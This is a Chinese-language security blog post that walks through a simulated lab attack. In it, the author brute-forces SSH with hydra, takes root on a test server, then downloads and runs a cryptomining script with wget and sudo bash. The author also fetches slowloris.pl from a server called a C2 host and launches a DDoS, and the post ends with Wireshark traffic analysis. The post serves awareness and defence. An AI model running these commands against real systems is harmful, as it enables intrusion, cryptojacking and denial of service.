歡迎光臨
每天分享高質量文章

模擬挖礦黑客攻擊過程

來自:信安之路(微信號:xazlsec)

作者:Cherishao

眨眼間,2018 年的上半年就這樣飛逝而過,在上半年的工作中,接觸最常規的安全事件就是服務器或者辦公主機被遠控作為肉雞挖礦來獲取利益或者對其它網站進行 DDoS 攻擊,今天分享一下如何利用 Linux 常規的 SSH 弱口令爆破 Linux 服務器並利用該服務器進行挖礦及對其它網站進行 DDoS 攻擊,攻擊即分析流程較為簡單,如有不適之處,歡迎斧正。

實驗環境

使用的 Linux 服務器及搭建的站點原始碼及使用的域名如下:

Linux: Kali  2.0

IP:192.168.95.132

網站部署原始碼:DiscuzX.7z

部署工具:phpstudy

Website Domain: Cherishao.com

使用的工具如下:

SSH爆破:hydra-8.1-windows

遠程終端管理:X term

分析工具:Wireshark

網站搭建

網上下載 DiscuzX 原始碼,利用 PHPStudy 快速建站工具,將其原始碼放在其 WWW 目錄下,啟動即可(閱讀 README.md 文件)。

域名系結

將自己的 IP 地址,系結在自己註冊的域名,添加解析記錄即可:

攻擊流程

利用安全工具對指定的平臺服務器(該服務器提供了常見的網絡服務,例如 Web 服務、終端服務等)進行 SSH 暴力破解攻擊。攻擊流程設計如下:

SSH 爆破

通過分析掃描標的站點(IP地址:192.168.95.132)服務器,發現服務器開啟 SSH22 端口、操作系統型別為 Linux。

利用 hydra 進行 SSH 爆破獲取服務器權限:

hydra -l root -P 字典 -V ssh://192.168.95.132

通過暴力破解得到的 (root/123456) 進入服務器:

連接上服務器後,運行腳本獲取遠端挖礦程式。服務器當前狀態:

利用服務器挖礦

獲取安裝腳本

wget –no-check-certificate https://www.yiluzhuanqian.com/soft/script/mservice_2_5.sh -O mservice.sh

執行腳本開始挖礦

sudo bash mservice.sh 10014 #該ID可替換為自己的用戶ID

服務器挖礦時的 CPU 狀態(CPU 飆升到 96%):

DDoS 攻擊

利用該服務器對(網站: Cherishao.com ) DDoS 攻擊。

從 C2 服務器,獲取 DDoS shell

Curl http://173.82.235.146/slowloris.pl

對該站點進行 DDos 攻擊

slowloris.pl  -dns cherishao.com -timeout 1 – num 1000

網站正常運行時狀態:

Ddos 攻擊後網站狀態:

通信特征流分析

利用 Wireshark 抓包分析

挖礦資料流分析

從上圖的通信資料流中,我們可以發現挖礦者使用的錢包地址:

42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik

代理:

“XMRig/2.5.2”

Xig 代理特征

DDoS 資料流分析

通過分析發現對Cherishao.com網站的大量DNS請求包:

總結及相關附件

總結

近些年,新出現了眾多入侵系統的手法,像 Apache Struts2 漏洞利用、Hadoop Yarn REST API未授權漏洞利用,但是古老的 SSH 暴力破解攻擊手段不僅沒有消亡,反而愈演愈烈。

本文通過這樣一個簡單的設計,主要是想傳達:一但 Hacker 取得了我們系統的權限,他可以做比較多的事情,信息竊取,資料破壞,對外攻擊等諸多對我們不利的事情,在日常的工作及生活中請加強密碼防護策略的重視,加強自身安全意識。

相關附件

https://pan.baidu.com/s/1ZkrmAmbNUHve6MW7cCQCNQ 密碼:mp3l

參考鏈接

SSH 暴力破解趨勢

http://www.freebuf.com/articles/paper/177473.html


編號663,輸入編號直達本文

●輸入m獲取文章目錄

赞(0)

分享創造快樂